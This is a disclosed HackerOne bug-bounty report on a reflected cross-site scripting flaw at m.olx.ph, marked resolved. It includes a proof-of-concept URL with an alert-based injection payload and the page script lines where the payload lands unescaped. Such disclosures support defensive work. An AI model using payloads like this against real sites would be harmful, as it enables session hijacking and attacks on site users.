Reflective XSS at m.olx.ph

Disclosed: 2016-10-28 07:30:42 By hogarth45 To olx

Medium

Vulnerability Details

**URL** https://m.olx.ph/mobile-phones-tablets/ph-'*alert(1)*'%3E%3Cimg%20src=x%3Easdf?q=qwerty Injection happens on lines 769, 770 and repeated also at 1005, 1006 ``` urlNoCategory = '/ph-'*alert(1)*'%3E%3Cimg%20src=x%3Easdf?q=qwerty'; urlNoLocation = '/mobile-phones-tablets/ph-'*alert(1)*'%3E%3Cimg%20src=x%3Easdf?q=qwerty'; ```

Actions

View on HackerOne

Report Stats

Report ID: 177230
State: Closed
Substate: resolved
Upvotes: 6

Reflective XSS at m.olx.ph

Vulnerability Details

Actions

Report Stats

Share this report